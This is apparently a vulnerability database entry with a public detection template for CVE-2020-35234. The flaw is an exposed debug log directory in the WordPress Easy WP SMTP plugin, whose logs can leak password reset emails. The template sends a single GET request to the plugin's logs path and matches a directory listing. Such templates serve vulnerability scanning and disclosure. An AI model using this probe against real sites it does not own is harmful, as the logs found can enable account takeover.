漏洞描述
Detected WordPress Easy WP SMTP plugin debug log file exposed via directory listing, potentially revealing sensitive email contents including password reset links.
wp-easy-wp-smtp-log-exposure: WordPress Easy WP SMTP - Log Exposure
PoC代码[已公开]
id: wp-easy-wp-smtp-log-exposure
info:
name: WordPress Easy WP SMTP - Log Exposure
author: 0x_Akoko
severity: medium
description: |
Detected WordPress Easy WP SMTP plugin debug log file exposed via directory listing, potentially revealing sensitive email contents including password reset links.
reference:
- https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35234
- https://wpscan.com/vulnerability/10494
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-35234
cwe-id: CWE-532
metadata:
verified: true
max-request: 1
tags: wp,wordpress,wp-plugin,easy-wp-smtp,exposure,logs
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/logs/"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Index of", "Parent Directory", "easy-wp-smtp", ".txt")'
condition: and
# digest: 4b0a00483046022100c7ce4b8923c5abe79a072bf2ceab8b488ab48c4db070d51cae145184fddf636b02210087ec07e1ba9f7be82142c4fba87c4eda98eec413c99f5d3cdbedf30ac702dcc9:922c64590222798bb761d5b6d8e72950